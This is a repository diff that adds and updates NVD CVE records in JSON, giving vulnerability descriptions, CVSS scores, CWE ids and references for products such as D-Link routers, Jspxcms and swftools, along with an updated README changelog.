"attackComplexity": "LOW",
"privilegesRequired": "LOW",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4
}
],
"cvssMetricV2": [
{
"source": "cna@vuldb.com",
"type": "Secondary",
"cvssData": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"accessVector": "NETWORK",
"accessComplexity": "LOW",
"authentication": "SINGLE",
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5
},
"baseSeverity": "MEDIUM",
"exploitabilityScore": 8.0,
"impactScore": 6.4,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
}
]
},
"weaknesses": [
{
"source": "cna@vuldb.com",
"type": "Secondary",
"description": [
{
"lang": "en",
"value": "CWE-78"
}
]
}
],
"references": [
{
"url": "https://vuldb.com/?ctiid.251540",
"source": "cna@vuldb.com"
},
{
"url": "https://vuldb.com/?id.251540",
"source": "cna@vuldb.com"
}
]
}

88
CVE-2024/CVE-2024-07xx/CVE-2024-0716.json Normal file
View File

@ -0,0 +1,88 @@
{
"id": "CVE-2024-0716",
"sourceIdentifier": "cna@vuldb.com",
"published": "2024-01-19T15:15:09.240",
"lastModified": "2024-01-19T15:56:19.500",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",
"value": "A vulnerability classified as problematic has been found in Beijing Baichuo Smart S150 Management Platform V31R02B15. This affects an unknown part of the file /log/download.php of the component Backup File Handler. The manipulation leads to information disclosure. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-251541 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "cna@vuldb.com",
"type": "Secondary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N",
"attackVector": "NETWORK",
"attackComplexity": "HIGH",
"privilegesRequired": "LOW",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"availabilityImpact": "NONE",
"baseScore": 3.1,
"baseSeverity": "LOW"
},
"exploitabilityScore": 1.6,
"impactScore": 1.4
}
],
"cvssMetricV2": [
{
"source": "cna@vuldb.com",
"type": "Secondary",
"cvssData": {
"version": "2.0",
"vectorString": "AV:N/AC:H/Au:S/C:P/I:N/A:N",
"accessVector": "NETWORK",
"accessComplexity": "HIGH",
"authentication": "SINGLE",
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"availabilityImpact": "NONE",
"baseScore": 2.1
},
"baseSeverity": "LOW",
"exploitabilityScore": 3.9,
"impactScore": 2.9,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
}
]
},
"weaknesses": [
{
"source": "cna@vuldb.com",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-200"
}
]
}
],
"references": [
{
"url": "https://github.com/GTA12138/vul/blob/main/smart%20s150/s150%20Download%20any%20file/smart%20s150%20download%20any%20file.md",
"source": "cna@vuldb.com"
},
{
"url": "https://vuldb.com/?ctiid.251541",
"source": "cna@vuldb.com"
},
{
"url": "https://vuldb.com/?id.251541",
"source": "cna@vuldb.com"
}
]
}

88
CVE-2024/CVE-2024-07xx/CVE-2024-0717.json Normal file
View File

@ -0,0 +1,88 @@
{
"id": "CVE-2024-0717",
"sourceIdentifier": "cna@vuldb.com",
"published": "2024-01-19T16:15:11.190",
"lastModified": "2024-01-19T16:15:11.190",
"vulnStatus": "Received",
"descriptions": [
{
"lang": "en",
"value": "A vulnerability classified as critical was found in D-Link DAP-1360, DIR-300, DIR-615, DIR-615GF, DIR-615S, DIR-615T, DIR-620, DIR-620S, DIR-806A, DIR-815, DIR-815AC, DIR-815S, DIR-816, DIR-820, DIR-822, DIR-825, DIR-825AC, DIR-825ACF, DIR-825ACG1, DIR-841, DIR-842, DIR-842S, DIR-843, DIR-853, DIR-878, DIR-882, DIR-1210, DIR-1260, DIR-2150, DIR-X1530, DIR-X1860, DSL-224, DSL-245GR, DSL-2640U, DSL-2750U, DSL-G2452GR, DVG-5402G, DVG-5402G, DVG-5402GFRU, DVG-N5402G, DVG-N5402G-IL, DWM-312W, DWM-321, DWR-921, DWR-953 and Good Line Router v2 up to 20240112. This vulnerability affects unknown code of the file /devinfo of the component HTTP GET Request Handler. The manipulation of the argument area with the input notice|net|version leads to information disclosure. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-251542 is the identifier assigned to this vulnerability."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "cna@vuldb.com",
"type": "Secondary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4
}
],
"cvssMetricV2": [
{
"source": "cna@vuldb.com",
"type": "Secondary",
"cvssData": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"accessVector": "NETWORK",
"accessComplexity": "LOW",
"authentication": "NONE",
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.0
},
"baseSeverity": "MEDIUM",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
}
]
},
"weaknesses": [
{
"source": "cna@vuldb.com",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-200"
}
]
}
],
"references": [
{
"url": "https://github.com/999zzzzz/D-Link",
"source": "cna@vuldb.com"
},
{
"url": "https://vuldb.com/?ctiid.251542",
"source": "cna@vuldb.com"
},
{
"url": "https://vuldb.com/?id.251542",
"source": "cna@vuldb.com"
}
]
}

88
CVE-2024/CVE-2024-07xx/CVE-2024-0718.json Normal file
View File

@ -0,0 +1,88 @@
{
"id": "CVE-2024-0718",
"sourceIdentifier": "cna@vuldb.com",
"published": "2024-01-19T16:15:11.507",
"lastModified": "2024-01-19T16:15:11.507",
"vulnStatus": "Received",
"descriptions": [
{
"lang": "en",
"value": "A vulnerability, which was classified as problematic, has been found in liuwy-dlsdys zhglxt 4.7.7. This issue affects some unknown processing of the file /oa/notify/edit of the component HTTP POST Request Handler. The manipulation of the argument notifyTitle leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251543."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "cna@vuldb.com",
"type": "Secondary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "HIGH",
"userInteraction": "REQUIRED",
"scope": "UNCHANGED",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"availabilityImpact": "NONE",
"baseScore": 2.4,
"baseSeverity": "LOW"
},
"exploitabilityScore": 0.9,
"impactScore": 1.4
}
],
"cvssMetricV2": [
{
"source": "cna@vuldb.com",
"type": "Secondary",
"cvssData": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:M/C:N/I:P/A:N",
"accessVector": "NETWORK",
"accessComplexity": "LOW",
"authentication": "MULTIPLE",
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"availabilityImpact": "NONE",
"baseScore": 3.3
},
"baseSeverity": "LOW",
"exploitabilityScore": 6.4,
"impactScore": 2.9,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
}
]
},
"weaknesses": [
{
"source": "cna@vuldb.com",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-79"
}
]
}
],
"references": [
{
"url": "https://github.com/biantaibao/zhglxt_xss/blob/main/xss.md",
"source": "cna@vuldb.com"
},
{
"url": "https://vuldb.com/?ctiid.251543",
"source": "cna@vuldb.com"
},
{
"url": "https://vuldb.com/?id.251543",
"source": "cna@vuldb.com"
}
]
}

88
CVE-2024/CVE-2024-07xx/CVE-2024-0720.json Normal file
View File

@ -0,0 +1,88 @@
{
"id": "CVE-2024-0720",
"sourceIdentifier": "cna@vuldb.com",
"published": "2024-01-19T16:15:11.733",
"lastModified": "2024-01-19T16:15:11.733",
"vulnStatus": "Received",
"descriptions": [
{
"lang": "en",
"value": "A vulnerability, which was classified as problematic, was found in FactoMineR FactoInvestigate up to 1.9. Affected is an unknown function of the component HTML Report Generator. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251544. NOTE: The vendor was contacted early about this disclosure but did not respond in any way."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "cna@vuldb.com",
"type": "Secondary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "LOW",
"userInteraction": "REQUIRED",
"scope": "UNCHANGED",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"baseSeverity": "LOW"
},
"exploitabilityScore": 2.1,
"impactScore": 1.4
}
],
"cvssMetricV2": [
{
"source": "cna@vuldb.com",
"type": "Secondary",
"cvssData": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N",
"accessVector": "NETWORK",
"accessComplexity": "LOW",
"authentication": "SINGLE",
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"availabilityImpact": "NONE",
"baseScore": 4.0
},
"baseSeverity": "MEDIUM",
"exploitabilityScore": 8.0,
"impactScore": 2.9,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
}
]
},
"weaknesses": [
{
"source": "cna@vuldb.com",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-79"
}
]
}
],
"references": [
{
"url": "https://drive.google.com/drive/folders/1ZFjWlD5axvhWp--I7tuiZ9uOpSBmU_f6?usp=drive_link",
"source": "cna@vuldb.com"
},
{
"url": "https://vuldb.com/?ctiid.251544",
"source": "cna@vuldb.com"
},
{
"url": "https://vuldb.com/?id.251544",
"source": "cna@vuldb.com"
}
]
}

88
CVE-2024/CVE-2024-07xx/CVE-2024-0721.json Normal file
View File

@ -0,0 +1,88 @@
{
"id": "CVE-2024-0721",
"sourceIdentifier": "cna@vuldb.com",
"published": "2024-01-19T16:15:11.953",
"lastModified": "2024-01-19T16:15:11.953",
"vulnStatus": "Received",
"descriptions": [
{
"lang": "en",
"value": "A vulnerability has been found in Jspxcms 10.2.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Survey Label Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251545 was assigned to this vulnerability."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "cna@vuldb.com",
"type": "Secondary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "LOW",
"userInteraction": "REQUIRED",
"scope": "UNCHANGED",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"baseSeverity": "LOW"
},
"exploitabilityScore": 2.1,
"impactScore": 1.4
}
],
"cvssMetricV2": [
{
"source": "cna@vuldb.com",
"type": "Secondary",
"cvssData": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N",
"accessVector": "NETWORK",
"accessComplexity": "LOW",
"authentication": "SINGLE",
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"availabilityImpact": "NONE",
"baseScore": 4.0
},
"baseSeverity": "MEDIUM",
"exploitabilityScore": 8.0,
"impactScore": 2.9,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
}
]
},
"weaknesses": [
{
"source": "cna@vuldb.com",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-79"
}
]
}
],
"references": [
{
"url": "https://github.com/sweatxi/BugHub/blob/main/jspXCMS-%20Survey%20label.pdf",
"source": "cna@vuldb.com"
},
{
"url": "https://vuldb.com/?ctiid.251545",
"source": "cna@vuldb.com"
},
{
"url": "https://vuldb.com/?id.251545",
"source": "cna@vuldb.com"
}
]
}

4
CVE-2024/CVE-2024-217xx/CVE-2024-21733.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2024-21733",
"sourceIdentifier": "security@apache.org",
"published": "2024-01-19T11:15:08.043",
"lastModified": "2024-01-19T12:15:08.683",
"vulnStatus": "Received",
"lastModified": "2024-01-19T15:56:26.533",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",

20
CVE-2024/CVE-2024-225xx/CVE-2024-22562.json Normal file
View File

@ -0,0 +1,20 @@
{
"id": "CVE-2024-22562",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-19T15:15:09.463",
"lastModified": "2024-01-19T15:56:19.500",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",
"value": "swftools 0.9.2 was discovered to contain a Stack Buffer Underflow via the function dict_foreach_keyvalue at swftools/lib/q.c."
}
],
"metrics": {},
"references": [
{
"url": "https://github.com/matthiaskramm/swftools/issues/210",
"source": "cve@mitre.org"
}
]
}

20
CVE-2024/CVE-2024-225xx/CVE-2024-22563.json Normal file
View File

@ -0,0 +1,20 @@
{
"id": "CVE-2024-22563",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-19T15:15:09.513",
"lastModified": "2024-01-19T15:56:19.500",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",
"value": "openvswitch 2.17.8 was discovered to contain a memory leak via the function xmalloc__ in openvswitch-2.17.8/lib/util.c."
}
],
"metrics": {},
"references": [
{
"url": "https://github.com/openvswitch/ovs-issues/issues/315",
"source": "cve@mitre.org"
}
]
}

4
CVE-2024/CVE-2024-228xx/CVE-2024-22876.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2024-22876",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-19T14:15:13.510",
"lastModified": "2024-01-19T14:15:13.510",
"vulnStatus": "Received",
"lastModified": "2024-01-19T15:56:19.500",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",

4
CVE-2024/CVE-2024-228xx/CVE-2024-22877.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2024-22877",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-19T14:15:13.557",
"lastModified": "2024-01-19T14:15:13.557",
"vulnStatus": "Received",
"lastModified": "2024-01-19T15:56:19.500",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",

20
CVE-2024/CVE-2024-229xx/CVE-2024-22920.json Normal file
View File

@ -0,0 +1,20 @@
{
"id": "CVE-2024-22920",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-19T15:15:09.560",
"lastModified": "2024-01-19T15:56:19.500",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",
"value": "swftools 0.9.2 was discovered to contain a heap-use-after-free via the function bufferWriteData in swftools/lib/action/compile.c."
}
],
"metrics": {},
"references": [
{
"url": "https://github.com/matthiaskramm/swftools/issues/211",
"source": "cve@mitre.org"
}
]
}

8
CVE-2024/CVE-2024-233xx/CVE-2024-23387.json
View File

@ -2,12 +2,16 @@
"id": "CVE-2024-23387",
"sourceIdentifier": "vultures@jpcert.or.jp",
"published": "2024-01-19T04:15:09.987",
"lastModified": "2024-01-19T04:15:09.987",
"vulnStatus": "Received",
"lastModified": "2024-01-19T15:56:26.533",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",
"value": "FusionPBX prior to 5.1.0 contains a cross-site scripting vulnerability. If this vulnerability is exploited by a remote authenticated attacker with an administrative privilege, an arbitrary script may be executed on the web browser of the user who is logging in to the product."
},
{
"lang": "es",
"value": "FusionPBX anterior a 5.1.0 contiene una vulnerabilidad de Cross-Site Scripting. Si esta vulnerabilidad es aprovechada por un atacante remoto autenticado con privilegios administrativos, se puede ejecutar un script arbitrario en el navegador web del usuario que inicia sesi\u00f3n en el producto."
}
],
"metrics": {},

8
CVE-2024/CVE-2024-236xx/CVE-2024-23659.json
View File

@ -2,12 +2,16 @@
"id": "CVE-2024-23659",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-19T05:15:09.233",
"lastModified": "2024-01-19T05:15:09.233",
"vulnStatus": "Received",
"lastModified": "2024-01-19T15:56:26.533",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",
"value": "SPIP before 4.1.14 and 4.2.x before 4.2.8 allows XSS via the name of an uploaded file. This is related to javascript/bigup.js and javascript/bigup.utils.js."
},
{
"lang": "es",
"value": "SPIP anterior a 4.1.14 y 4.2.x anterior a 4.2.8 permite XSS mediante el nombre de un archivo cargado. Esto est\u00e1 relacionado con javascript/bigup.js y javascript/bigup.utils.js."
}
],
"metrics": {},

85
README.md
View File

@ -9,13 +9,13 @@ Repository synchronizes with the NVD every 2 hours.
### Last Repository Update
```plain
2024-01-19T15:00:24.702129+00:00
2024-01-19T17:00:25.391679+00:00
```
### Most recent CVE Modification Timestamp synchronized with NVD
```plain
2024-01-19T14:54:30.993000+00:00
2024-01-19T16:35:49.683000+00:00
```
### Last Data Feed Release
@ -29,56 +29,57 @@ Download and Changelog: [Click](https://github.com/fkie-cad/nvd-json-data-feeds/
### Total Number of included CVEs
```plain
236371
236384
```
### CVEs added in the last Commit
Recently added CVEs: `12`
Recently added CVEs: `13`
* [CVE-2023-27168](CVE-2023/CVE-2023-271xx/CVE-2023-27168.json) (`2024-01-19T14:15:12.247`)
* [CVE-2023-43985](CVE-2023/CVE-2023-439xx/CVE-2023-43985.json) (`2024-01-19T14:15:12.317`)
* [CVE-2023-46351](CVE-2023/CVE-2023-463xx/CVE-2023-46351.json) (`2024-01-19T14:15:12.367`)
* [CVE-2023-50028](CVE-2023/CVE-2023-500xx/CVE-2023-50028.json) (`2024-01-19T14:15:12.413`)
* [CVE-2023-50030](CVE-2023/CVE-2023-500xx/CVE-2023-50030.json) (`2024-01-19T14:15:12.453`)
* [CVE-2023-51946](CVE-2023/CVE-2023-519xx/CVE-2023-51946.json) (`2024-01-19T14:15:12.500`)
* [CVE-2023-51947](CVE-2023/CVE-2023-519xx/CVE-2023-51947.json) (`2024-01-19T14:15:12.553`)
* [CVE-2023-51948](CVE-2023/CVE-2023-519xx/CVE-2023-51948.json) (`2024-01-19T14:15:12.663`)
* [CVE-2024-0712](CVE-2024/CVE-2024-07xx/CVE-2024-0712.json) (`2024-01-19T14:15:12.837`)
* [CVE-2024-0713](CVE-2024/CVE-2024-07xx/CVE-2024-0713.json) (`2024-01-19T14:15:13.277`)
* [CVE-2024-22876](CVE-2024/CVE-2024-228xx/CVE-2024-22876.json) (`2024-01-19T14:15:13.510`)
* [CVE-2024-22877](CVE-2024/CVE-2024-228xx/CVE-2024-22877.json) (`2024-01-19T14:15:13.557`)
* [CVE-2022-40700](CVE-2022/CVE-2022-407xx/CVE-2022-40700.json) (`2024-01-19T15:15:08.020`)
* [CVE-2022-45083](CVE-2022/CVE-2022-450xx/CVE-2022-45083.json) (`2024-01-19T15:15:08.247`)
* [CVE-2022-45845](CVE-2022/CVE-2022-458xx/CVE-2022-45845.json) (`2024-01-19T15:15:08.467`)
* [CVE-2022-47160](CVE-2022/CVE-2022-471xx/CVE-2022-47160.json) (`2024-01-19T15:15:08.777`)
* [CVE-2024-0714](CVE-2024/CVE-2024-07xx/CVE-2024-0714.json) (`2024-01-19T15:15:08.997`)
* [CVE-2024-0716](CVE-2024/CVE-2024-07xx/CVE-2024-0716.json) (`2024-01-19T15:15:09.240`)
* [CVE-2024-22562](CVE-2024/CVE-2024-225xx/CVE-2024-22562.json) (`2024-01-19T15:15:09.463`)
* [CVE-2024-22563](CVE-2024/CVE-2024-225xx/CVE-2024-22563.json) (`2024-01-19T15:15:09.513`)
* [CVE-2024-22920](CVE-2024/CVE-2024-229xx/CVE-2024-22920.json) (`2024-01-19T15:15:09.560`)
* [CVE-2024-0717](CVE-2024/CVE-2024-07xx/CVE-2024-0717.json) (`2024-01-19T16:15:11.190`)
* [CVE-2024-0718](CVE-2024/CVE-2024-07xx/CVE-2024-0718.json) (`2024-01-19T16:15:11.507`)
* [CVE-2024-0720](CVE-2024/CVE-2024-07xx/CVE-2024-0720.json) (`2024-01-19T16:15:11.733`)
* [CVE-2024-0721](CVE-2024/CVE-2024-07xx/CVE-2024-0721.json) (`2024-01-19T16:15:11.953`)
### CVEs modified in the last Commit
Recently modified CVEs: `46`
Recently modified CVEs: `69`
* [CVE-2024-0486](CVE-2024/CVE-2024-04xx/CVE-2024-0486.json) (`2024-01-19T14:21:56.513`)
* [CVE-2024-0485](CVE-2024/CVE-2024-04xx/CVE-2024-0485.json) (`2024-01-19T14:22:14.600`)
* [CVE-2024-0474](CVE-2024/CVE-2024-04xx/CVE-2024-0474.json) (`2024-01-19T14:23:04.517`)
* [CVE-2024-0484](CVE-2024/CVE-2024-04xx/CVE-2024-0484.json) (`2024-01-19T14:23:24.007`)
* [CVE-2024-20985](CVE-2024/CVE-2024-209xx/CVE-2024-20985.json) (`2024-01-19T14:24:29.627`)
* [CVE-2024-20983](CVE-2024/CVE-2024-209xx/CVE-2024-20983.json) (`2024-01-19T14:24:38.097`)
* [CVE-2024-20981](CVE-2024/CVE-2024-209xx/CVE-2024-20981.json) (`2024-01-19T14:24:48.497`)
* [CVE-2024-20977](CVE-2024/CVE-2024-209xx/CVE-2024-20977.json) (`2024-01-19T14:25:05.253`)
* [CVE-2024-20975](CVE-2024/CVE-2024-209xx/CVE-2024-20975.json) (`2024-01-19T14:25:11.520`)
* [CVE-2024-20973](CVE-2024/CVE-2024-209xx/CVE-2024-20973.json) (`2024-01-19T14:25:24.967`)
* [CVE-2024-20971](CVE-2024/CVE-2024-209xx/CVE-2024-20971.json) (`2024-01-19T14:25:31.020`)
* [CVE-2024-20969](CVE-2024/CVE-2024-209xx/CVE-2024-20969.json) (`2024-01-19T14:25:42.850`)
* [CVE-2024-20967](CVE-2024/CVE-2024-209xx/CVE-2024-20967.json) (`2024-01-19T14:25:50.880`)
* [CVE-2024-20965](CVE-2024/CVE-2024-209xx/CVE-2024-20965.json) (`2024-01-19T14:26:06.187`)
* [CVE-2024-20963](CVE-2024/CVE-2024-209xx/CVE-2024-20963.json) (`2024-01-19T14:26:13.473`)
* [CVE-2024-20961](CVE-2024/CVE-2024-209xx/CVE-2024-20961.json) (`2024-01-19T14:26:21.527`)
* [CVE-2024-0233](CVE-2024/CVE-2024-02xx/CVE-2024-0233.json) (`2024-01-19T14:28:14.077`)
* [CVE-2024-0235](CVE-2024/CVE-2024-02xx/CVE-2024-0235.json) (`2024-01-19T14:28:22.047`)
* [CVE-2024-0236](CVE-2024/CVE-2024-02xx/CVE-2024-0236.json) (`2024-01-19T14:28:41.540`)
* [CVE-2024-0237](CVE-2024/CVE-2024-02xx/CVE-2024-0237.json) (`2024-01-19T14:29:02.700`)
* [CVE-2024-0238](CVE-2024/CVE-2024-02xx/CVE-2024-0238.json) (`2024-01-19T14:29:13.280`)
* [CVE-2024-22628](CVE-2024/CVE-2024-226xx/CVE-2024-22628.json) (`2024-01-19T14:33:00.143`)
* [CVE-2024-22627](CVE-2024/CVE-2024-226xx/CVE-2024-22627.json) (`2024-01-19T14:38:53.237`)
* [CVE-2024-22626](CVE-2024/CVE-2024-226xx/CVE-2024-22626.json) (`2024-01-19T14:40:09.903`)
* [CVE-2024-22625](CVE-2024/CVE-2024-226xx/CVE-2024-22625.json) (`2024-01-19T14:40:27.910`)
* [CVE-2023-40692](CVE-2023/CVE-2023-406xx/CVE-2023-40692.json) (`2024-01-19T16:15:09.330`)
* [CVE-2023-46219](CVE-2023/CVE-2023-462xx/CVE-2023-46219.json) (`2024-01-19T16:15:09.430`)
* [CVE-2023-47701](CVE-2023/CVE-2023-477xx/CVE-2023-47701.json) (`2024-01-19T16:15:09.547`)
* [CVE-2023-49285](CVE-2023/CVE-2023-492xx/CVE-2023-49285.json) (`2024-01-19T16:15:09.653`)
* [CVE-2023-49286](CVE-2023/CVE-2023-492xx/CVE-2023-49286.json) (`2024-01-19T16:15:09.793`)
* [CVE-2023-49288](CVE-2023/CVE-2023-492xx/CVE-2023-49288.json) (`2024-01-19T16:15:09.930`)
* [CVE-2023-50269](CVE-2023/CVE-2023-502xx/CVE-2023-50269.json) (`2024-01-19T16:15:10.063`)
* [CVE-2023-50495](CVE-2023/CVE-2023-504xx/CVE-2023-50495.json) (`2024-01-19T16:15:10.193`)
* [CVE-2023-5528](CVE-2023/CVE-2023-55xx/CVE-2023-5528.json) (`2024-01-19T16:15:10.280`)
* [CVE-2023-5868](CVE-2023/CVE-2023-58xx/CVE-2023-5868.json) (`2024-01-19T16:15:10.410`)
* [CVE-2023-5869](CVE-2023/CVE-2023-58xx/CVE-2023-5869.json) (`2024-01-19T16:15:10.620`)
* [CVE-2023-5870](CVE-2023/CVE-2023-58xx/CVE-2023-5870.json) (`2024-01-19T16:15:10.867`)
* [CVE-2023-6277](CVE-2023/CVE-2023-62xx/CVE-2023-6277.json) (`2024-01-19T16:15:11.057`)
* [CVE-2023-42136](CVE-2023/CVE-2023-421xx/CVE-2023-42136.json) (`2024-01-19T16:19:25.047`)
* [CVE-2023-42137](CVE-2023/CVE-2023-421xx/CVE-2023-42137.json) (`2024-01-19T16:21:06.650`)
* [CVE-2023-4818](CVE-2023/CVE-2023-48xx/CVE-2023-4818.json) (`2024-01-19T16:35:49.683`)
* [CVE-2024-0712](CVE-2024/CVE-2024-07xx/CVE-2024-0712.json) (`2024-01-19T15:56:19.500`)
* [CVE-2024-0713](CVE-2024/CVE-2024-07xx/CVE-2024-0713.json) (`2024-01-19T15:56:19.500`)
* [CVE-2024-22876](CVE-2024/CVE-2024-228xx/CVE-2024-22876.json) (`2024-01-19T15:56:19.500`)
* [CVE-2024-22877](CVE-2024/CVE-2024-228xx/CVE-2024-22877.json) (`2024-01-19T15:56:19.500`)
* [CVE-2024-23387](CVE-2024/CVE-2024-233xx/CVE-2024-23387.json) (`2024-01-19T15:56:26.533`)
* [CVE-2024-23659](CVE-2024/CVE-2024-236xx/CVE-2024-23659.json) (`2024-01-19T15:56:26.533`)
* [CVE-2024-0705](CVE-2024/CVE-2024-07xx/CVE-2024-0705.json) (`2024-01-19T15:56:26.533`)
* [CVE-2024-21733](CVE-2024/CVE-2024-217xx/CVE-2024-21733.json) (`2024-01-19T15:56:26.533`)
* [CVE-2024-0318](CVE-2024/CVE-2024-03xx/CVE-2024-0318.json) (`2024-01-19T16:13:08.503`)
## Download and Usage